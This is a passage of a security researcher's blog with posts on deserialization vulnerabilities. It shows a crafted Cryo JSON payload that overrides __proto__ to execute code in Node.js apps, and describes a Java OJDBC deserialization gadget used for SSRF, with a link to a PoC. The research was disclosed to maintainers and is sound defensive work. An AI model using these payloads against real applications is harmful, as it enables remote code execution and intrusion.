<pre><code class=" hljs json">{"<span class="hljs-attribute">root</span>":<span class="hljs-value"><span class="hljs-string">"_CRYO_REF_1"</span></span>,"<span class="hljs-attribute">references</span>":<span class="hljs-value">[{"<span class="hljs-attribute">contents</span>":<span class="hljs-value">{}</span>,"<span class="hljs-attribute">value</span>":<span class="hljs-value"><span class="hljs-string">"_CRYO_FUNCTION_function () {return 1111;}"</span></span>},{"<span class="hljs-attribute">contents</span>":<span class="hljs-value">{"<span class="hljs-attribute">testFunc</span>":<span class="hljs-value"><span class="hljs-string">"_CRYO_REF_0"</span></span>}</span>,"<span class="hljs-attribute">value</span>":<span class="hljs-value"><span class="hljs-string">"_CRYO_OBJECT_"</span></span>}]</span>}</code></pre>
</blockquote>
For our attack we can create a serialized JSON object with a <code>custom __proto__</code>.
We can create our object with our own methods for the object’s
prototype, but as a small trick, we can set an incorrect name for <code>__proto__</code> (because we don’t want to rewrite a prototype of the object in our application) and serialize it.<br />
<blockquote class="tr_bq">
<pre><code class=" hljs javascript"><span class="hljs-keyword">var</span> obj = {
__proto: {
toString: <span class="hljs-function"><span class="hljs-keyword">function</span><span class="hljs-params">()</span> </span>{<span class="hljs-built_in">console</span>.log(<span class="hljs-string">"defconrussia"</span>); <span class="hljs-keyword">return</span> <span class="hljs-number">1111</span>;},
valueOf: <span class="hljs-function"><span class="hljs-keyword">function</span><span class="hljs-params">()</span> </span>{<span class="hljs-built_in">console</span>.log(<span class="hljs-string">"defconrussia"</span>); <span class="hljs-keyword">return</span> <span class="hljs-number">2222</span>;}
}
};</code></pre>
</blockquote>
So we get serialized object and rename from <code>__proto</code> to <code>__proto__</code> in it:<br />
<blockquote class="tr_bq">
<pre><code class=" hljs json">{"<span class="hljs-attribute">root</span>":<span class="hljs-value"><span class="hljs-string">"CRYO_REF_3"</span></span>,"<span class="hljs-attribute">references</span>":<span class="hljs-value">[{"<span class="hljs-attribute">contents</span>":<span class="hljs-value">{}</span>,"<span class="hljs-attribute">value</span>":<span class="hljs-value"><span class="hljs-string">"_CRYO_FUNCTION_function () {console.log(\"defconrussia\"); return 1111;}"</span></span>},{"<span class="hljs-attribute">contents</span>":<span class="hljs-value">{}</span>,"<span class="hljs-attribute">value</span>":<span class="hljs-value"><span class="hljs-string">"_CRYO_FUNCTION_function () {return 2222;}"</span></span>},{"<span class="hljs-attribute">contents</span>":<span class="hljs-value">{"<span class="hljs-attribute">toString</span>":<span class="hljs-value"><span class="hljs-string">"_CRYO_REF_0"</span></span>,"<span class="hljs-attribute">valueOf</span>":<span class="hljs-value"><span class="hljs-string">"_CRYO_REF_1"</span></span>}</span>,"<span class="hljs-attribute">value</span>":<span class="hljs-value"><span class="hljs-string">"_CRYO_OBJECT"</span></span>},{"<span class="hljs-attribute">contents</span>":<span class="hljs-value">{"<span class="hljs-attribute">proto</span>":<span class="hljs-value"><span class="hljs-string">"CRYO_REF_2"</span></span>}</span>,"<span class="hljs-attribute">value</span>":<span class="hljs-value"><span class="hljs-string">"_CRYO_OBJECT"</span></span>}]</span>}</code></pre>
</blockquote>
When we send that JSON payload to an application, the package Cryo
deserializes the payload in an object, but also changes the object’s
prototype to our value. Therefore, if the application interacts with the
object somehow, converts it to a sting, for example, then the
prototype’s method will be called and our code will be executed. So,
it’s RCE.<br />
<br />
I tried to find packages with similar issues, but most of them didn’t
support serialization of function. I didn’t find any other way to
reconstruct <code>functions in __proto__</code>. Nevertheless, as many packages use square bracket notation, we can rewrite <code>__proto__</code>
for them too and spoil prototypes of newly created objects. What
happens when an application calls any prototype method of such objects?
It may crash due to an unhandled TypeError exception.<br />
<br />
In addition, I should mention that the whole idea potentially works
for deserialization from any format (not only JSON). Once both features
are in place, a package is potentially vulnerable. Another thing is that
<code>JSON.parse</code> is not “vulnerable” to <code>__proto__ </code>rewriting.<br />
<br />
<h3>
function stringify == eval</h3>
While Googling, I came across another approach of serializing objects
with fuctions. The idea is to first stringify functions, then to <code>JSON.stringify</code> the whole object. “Deserialization” consists of the same steps in reverse order. Examples of such <code>function-stringifiers</code> are packages <code>cardigan</code>, <code>nor-function</code> and so on. All(?) of them are insecure (due to <code>eval</code> & co) and allow code execution using IIFE during unstringifying.<br />
<br />
<h3>
Conclusion</h3>
For pentesters: Look closely at square bracket notation and access <code>to __proto__</code>. It has good potential in some cases.<br />
<br />
For developers: I’m writing here that some packages are vulnerable,
but your application is only vulnerable when a user’s input comes to the
vulnerable function. Some packages are created in such an “insecure”
way ion purpose and will not be fixed. So don’t panic, and just check if
you depend on a non-standard serialization package and how you handle
user’s input in it.<br />
<br />
I shared information about both vulnerabilities with their maintainers using <a href="https://hackerone.com/nodejs-ecosystem">HackerOne’s program</a>. A warning message has been added to `funcster` package’s README. We were not able to reach cryo’s developers.<br />
<br />
PS: Thanks @lirantal from HackerOne for his cooperation on the above mentioned vulnerabilities.<br />
<br /></div>
Aleksei Tiurinhttp://www.blogger.com/profile/12130898511014099572noreply@blogger.com0tag:blogger.com,1999:blog-8095956197947792822.post-54376539088122883672018-01-12T10:51:00.001-08:002018-01-12T12:52:14.512-08:00Java Deserialization: Misusing OJDBC for SSRF<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<!--[if gte mso 9]><xml>
<o:OfficeDocumentSettings>
<o:AllowPNG/>
</o:OfficeDocumentSettings>
</xml><![endif]--><br />
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>RU</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><span lang="EN-US" style="mso-ansi-language: EN-US;">This year
ZeroNights has got a new zone - Web Village. It was a special "track"
for people who were interested in web security. The basic idea of the Web
Village is to tell people about typical vulnerabilities and attack techniques.
I made a speech about basics of deserialization vulns in various languages. I
wanted to show common patterns which make serialization libs potentially
vulnerable. There is <a href="https://speakerdeck.com/greendog/deserialization-vulnerabilities" target="_blank">that presentation</a>.</span><br />
<br />
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">In the
presentation I showed an example of a new Java gadget in order to prove that
it's stupid to "fix" gadgets or "blacklist" them instead of
protecting/changing deserialization lib. Here I’d like to show some details of the example.</span></div>
<div class="MsoNormal">
<br />
<span lang="EN-US" style="mso-ansi-language: EN-US;">The gadget
is a class in a library which is used to connect a Java application to a RDBMS
Oracle - ojdbc. Actually, this exact class (OraclePooledConnection) is
responsible for establishing a connection.</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">The example
is very simple, because the class has a readObject method which goal is to
reestablish connection to a database during a deserialization process.</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">In the bottom of the post you
can read the code, but it's not necessary, because we are going to use it in
the same way as it's supposed to be used.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">As we
control a field (connection_url) with a string where a java application tries
to connect during deserialization process, it means that we have a SSRF
vulnerability here.</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">At first
glance, it looks pretty useless, because the Oracle's protocol is binary. But I
played with Oracle DB some years ago and know that the client (and TNS
protocol) is very flexible. </span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">The
"URL" consists of several fields:</span><br />
<br />
<span lang="EN-US" style="mso-ansi-language: EN-US;">jdbc:oracle:thin:login/password@//any.domain.name.here.com:8888/service_name</span></div>
<div class="MsoNormal">
</div>
<div class="MsoNormal">
<br />
<span lang="EN-US" style="mso-ansi-language: EN-US;">I think
almost all of them are self-describing. </span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">An
important feature for us is that the "service name" field can contain a
very long value and almost any ASCII symbols. So, potentially we can
interact with text-based services. Yes, there will be binary garbage before the
service name and after, but many servers don't care much about such things ("errors friendly"). </span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggY_13qlbukquYJPZ65ql9DSVXRTUFw3_5PO0JY6A1qsTqbUhUq34veqmgu5wjLAs15YC3_o4X2a85MW7fgP8nj_by_t4eW-aP8bxBeOxOL_fcs1A9l2d2UvK2ar8CbmvkOKOELkVGISVH/s1600/ssrf.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="223" data-original-width="1002" height="141" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggY_13qlbukquYJPZ65ql9DSVXRTUFw3_5PO0JY6A1qsTqbUhUq34veqmgu5wjLAs15YC3_o4X2a85MW7fgP8nj_by_t4eW-aP8bxBeOxOL_fcs1A9l2d2UvK2ar8CbmvkOKOELkVGISVH/s640/ssrf.png" width="640" /></a></div>
</div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">So
step-by-step, we create a serialized object with a specific payload as service
name, send it to an application. The application runs readObject of
"OraclePooledConnection" class and it forces the application to
connect to wherever we want and to send our payload. </span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">So, my
point is pretty clear, the class doesn't really have any vulns, but we still
can misuse its features for our attacks.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;"><a href="https://github.com/GrrrDog/Sploits" target="_blank">There is a simple PoC</a>.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">PS: The
same "SSRF-attack" you can perform if you have access to Oracle DB
with privs that allow you to create DB links.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">P.P.S:
Potentially, the attack can be improved somehow... As we control the
"url" for connection, may be we can steal NetNTLM credentials
(because oracle auth supports it) or perform TNS Poisoning attack?</span><br />
<br />
<span lang="EN-US" style="mso-ansi-language: EN-US;"> </span><span lang="EN-US" style="mso-ansi-language: EN-US;">Code of readObject method of OraclePooledConnection class </span></div>
</div>
<script src="https://gist.github.com/GrrrDog/fef082956777d556f009e0d202197242.js"></script>
</div>
Aleksei Tiurinhttp://www.blogger.com/profile/12130898511014099572noreply@blogger.com0tag:blogger.com,1999:blog-8095956197947792822.post-69183861786546122352017-03-24T04:30:00.001-07:002017-03-24T04:52:09.799-07:00Autobinding vulns and Spring MVC<div dir="ltr" style="text-align: left;" trbidi="on">
<!--[if gte mso 9]><xml>
<o:OfficeDocumentSettings>
<o:AllowPNG/>
</o:OfficeDocumentSettings>
</xml><![endif]--><br />
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>RU</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="false"
DefSemiHidden="false" DefQFormat="false" DefPriority="99"
LatentStyleCount="371">
<w:LsdException Locked="false" Priority="0" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 9"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footnote text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="header"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footer"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index heading"/>
<w:LsdException Locked="false" Priority="35" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of figures"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope return"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="line number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="page number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of authorities"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="macro"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="toa heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 5"/>
<w:LsdException Locked="false" Priority="10" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Closing"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Signature"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="true"
UnhideWhenUsed="true" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Message Header"/>
<w:LsdException Locked="false" Priority="11" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Salutation"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Date"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Note Heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Block Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Hyperlink"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="FollowedHyperlink"/>
<w:LsdException Locked="false" Priority="22" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Document Map"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Plain Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="E-mail Signature"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Top of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Bottom of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal (Web)"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Acronym"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Cite"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Code"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Definition"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Keyboard"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Preformatted"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Sample"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Typewriter"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Variable"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Table"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation subject"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="No List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Contemporary"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Elegant"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Professional"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Balloon Text"/>
<w:LsdException Locked="false" Priority="39" Name="Table Grid"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Theme"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List"/>
